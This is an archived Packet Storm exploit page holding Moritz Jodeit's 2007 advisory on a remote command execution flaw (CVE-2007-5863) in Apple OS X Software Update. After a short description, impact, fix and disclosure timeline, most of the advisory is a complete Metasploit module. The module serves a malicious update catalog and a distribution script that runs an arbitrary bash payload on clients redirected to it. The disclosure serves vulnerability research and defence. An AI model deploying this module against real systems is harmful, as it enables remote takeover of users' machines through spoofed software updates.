exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

appleupdate-exec.txt

appleupdate-exec.txt
Posted Dec 18, 2007
Authored by Moritz Jodeit

Apple Mac OS X Software Update suffers from a remote command execution vulnerability. Full Metasploit module included.

tags | exploit, remote
systems | apple, osx
advisories | CVE-2007-5863
SHA-256 | 1852939fa989f4ddf6144fb1874a746c14013a7706681e093ad78115be9ffd22

appleupdate-exec.txt

Change Mirror Download
---------------------------------------------------------------------
Apple Mac OS X Software Update Remote Command Execution Vulnerability

Copyright (c) 2007 Moritz Jodeit <moritz@jodeit.org> (2007/12/17)
---------------------------------------------------------------------


I. Vulnerability Description

The OS X Software Update mechanism uses so called `distribution packages' [1],
which basically consist of two parts. The XML `catalog file', which lists the
available updates and the `distribution definition files' [1], which contain
information encoded in XML and JavaScript, defining every aspect of the
user experience, when installing an update.

When OS X checks for new updates, it first contacts swscan.apple.com
to receive the XML catalog file. This file references the distribution
definition files, which can reside on another server. Software Update
receives these files and calls some of the JavaScript functions to check,
if the update is suited for the local machine.

The catalog file and the distribution definition files are both received
using HTTP whithout any authentication. By running a malicious update server,
it is possible to provide distribution definition files, which execute
arbitrary commands using JavaScript on the remote machine requesting the
update. The System.run() method can be used for this, if the
`allow-external-scripts' option was set in the distribution definition
file, as documented in the "Installer JavaScript Reference" [2].

[1] http://developer.apple.com/documentation/DeveloperTools/Reference/DistributionDefinitionRef/
[2] http://developer.apple.com/documentation/DeveloperTools/Reference/InstallerJavaScriptRef/


II. Impact

Combined with the ability to intercept requests to the official Apple update
server by other means like ARP or DNS spoofing, it is possible to execute
arbitrary commands on all clients requesting updates. OS X automatically
checks for updates at regular intervals (default is weekly), which allows
for exploitation, even without any user intervention.


III. Solution

This vulnerability was fixed with the latest Apple update APPLE-SA-2007-12-17.


IV. Vendor Response

2007/12/06 Initial contact with <product-security@apple.com>
2007/12/06 Acknowledgement of received report
2007/12/12 Agreement on public release date
2007/12/17 Coordinated release of updates and advisory


V. Proof Of Concept

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

module Msf

class Exploits::Osx::Browser::Software_Update < Msf::Exploit::Remote

include Exploit::Remote::HttpServer::HTML

def initialize(info = {})
super(update_info(info,
'Name' => 'Apple OS X Software Update Command Execution',
'Description' => %q{
This module exploits a feature in the Distribution Packages,
which are used in the Apple Software Update mechanism. This feature
allows for arbitrary command execution through JavaScript. This exploit
provides the malicious update server. Requests must be redirected to
this server by other means for this exploit to work.
},
'Author' => [ 'Moritz Jodeit <moritz@jodeit.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2007-5863'],
],
'Payload' =>
{
'BadChars' => "\x00",
'DisableNops' => true,
},
'Platform' => 'osx',
'Targets' =>
[
[
'Automatic',
{
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
},
],
],
'DisclosureDate' => 'Dec 17 2007',
'DefaultTarget' => 0))

register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),
OptString.new('URIPATH', [ true, "The URI to use for this exploit.", "/" ])
], self.class)
end

# Encode some characters using character entity references and escape
# any quotation characters, by splitting the string into multiple parts.
def encode_payload(payload)
encoded = payload.gsub(/[&<>"']/) do |s|
case s
when '&': "&"
when '<': "<"
when '>': ">"
when '"': '"+\'"\'+"'
when '\'': "'"
end
end
return '"' + encoded + '"'
end

# Generate the initial catalog file with references to the
# distribution script, which does the actual exploitation.
def generate_catalog(server)
languages = [ "", "Dutsch", "English", "French", "German", "Italian", "Japanese",
"Spanish", "da", "fi", "ko", "no", "pt", "sv", "zh_CN", "zh_TW" ]
productkey = rand_text_numeric(3) + "-" + rand_text_numeric(4)
distfile = rand_text_alpha(8) + ".dist"

sucatalog = '<?xml version="1.0" encoding="UTF-8"?>'
sucatalog << '<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">'
sucatalog << '<plist version="1.0">'
sucatalog << '<dict>'
sucatalog << '<key>Products</key><dict>'
sucatalog << "<key>#{productkey}</key><dict>"
sucatalog << '<key>Distributions</key><dict>'

languages.each do |l|
sucatalog << "<key>#{l}</key><string>http://#{server}/#{distfile}</string>\n"
end

sucatalog << '</dict></dict></dict></dict></plist>'

return sucatalog
end

# Generate distribution script, which calls our payload using JavaScript.
def generate_dist(payload)
func = rand_text_alpha(8)

dist = '<?xml version="1.0" encoding="UTF-8"?>'
dist << "<installer-gui-script minSpecVersion='1'>"
dist << '<options allow-external-scripts = "yes"/>'
dist << "<choices-outline ui='SoftwareUpdate'>"
dist << "<line choice='su'/>"
dist << "</choices-outline>"
dist << "<choice id='su' visible ='#{func}()'/>"
dist << "<script>"
dist << "function #{func}() { system.run('/bin/bash', '-c', #{encode_payload(payload)}); }"
dist << "</script>"
dist << "</installer-gui-script>"

return dist
end

def on_request_uri(cli, request)
date = Time.now
server = "swscan.apple.com"

header = {
'Content-Type' => 'text/plain',
'Last-Modified' => date,
'Date' => date,
}

if request.uri =~ /\.sucatalog$/
print_status("Sending initial distribution package to #{cli.peerhost}:#{cli.peerport}")
body = generate_catalog(server)
elsif request.uri =~ /\.dist$/
print_status("Sending distribution script to #{cli.peerhost}:#{cli.peerport}")
return if ((p = regenerate_payload(cli)) == nil)
body = generate_dist(p.encoded)
else
return
end
send_response(cli, body, header)
handler(cli)
end

end
end
Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close